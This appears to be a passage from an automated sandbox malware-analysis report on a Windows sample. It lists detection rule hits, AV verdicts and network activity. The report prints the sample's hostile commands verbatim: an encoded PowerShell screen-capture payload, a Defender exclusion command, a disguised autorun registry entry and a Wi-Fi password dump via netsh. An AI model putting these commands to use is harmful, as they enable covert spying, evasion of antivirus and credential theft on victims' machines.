                      Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\WdlA0C4PkO.exe, ProcessId: 7648, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service
                      Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABF
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WdlA0C4PkO.exe", ParentImage: C:\Users\user\Desktop\WdlA0C4PkO.exe, ParentProcessId: 7648, ParentProcessName: WdlA0C4PkO.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, ProcessId: 7940, ProcessName: powershell.exe
                      Sigma detected: Suspicious Execution of Powershell with Base64
                      Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                      Sigma detected: Dynamic CSharp Compile Artefact
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7668, TargetFilename: C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WdlA0C4PkO.exe", ParentImage: C:\Users\user\Desktop\WdlA0C4PkO.exe, ParentProcessId: 7648, ParentProcessName: WdlA0C4PkO.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, ProcessId: 7940, ProcessName: powershell.exe

                      Data Obfuscation

                      barindex
                      Sigma detected: Dot net compiler compiles file from suspicious location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABF

                      Stealing of Sensitive Information

                      barindex
                      Sigma detected: Capture Wi-Fi password
                      Source: Process startedAuthor: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Users\user\Desktop\WdlA0C4PkO.exe", ParentImage: C:\Users\user\Desktop\WdlA0C4PkO.exe, ParentProcessId: 7648, ParentProcessName: WdlA0C4PkO.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 7496, ProcessName: netsh.exe

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeReversingLabs: Detection: 55%
                      Multi AV Scanner detection for submitted file
                      Source: WdlA0C4PkO.exeReversingLabs: Detection: 55%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: WdlA0C4PkO.exeJoe Sandbox ML: detected
                      Source: WdlA0C4PkO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: 6C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.pdb source: powershell.exe, 00000012.00000002.1665126840.000001FC94B10000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: a1.pdbTa source: powershell.exe, 00000012.00000002.1738126119.000001FCAB7CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 6C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.pdbhPR source: powershell.exe, 00000012.00000002.1665126840.000001FC94B10000.00000004.00000800.00020000.00000000.sdmp
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: ip-api.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: powershell.exe, 00000012.00000002.1664878909.000001FC918E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                      Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: http://ip-api.com/json
                      Source: powershell.exe, 0000000C.00000002.1580104465.000001C995732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1726793119.000001FCA36C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1665126840.000001FC94E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000012.00000002.1665126840.000001FC94E1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 0000000C.00000002.1536659501.000001C9858E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 0000000C.00000002.1536659501.000001C9856C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1665126840.000001FC93511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000C.00000002.1536659501.000001C9858E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000012.00000002.1665126840.000001FC94C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: powershell.exe, 00000012.00000002.1665126840.000001FC94E1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 0000000C.00000002.1604710839.000001C99DBF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                      Source: powershell.exe, 0000000C.00000002.1536659501.000001C9856C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1665126840.000001FC93511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
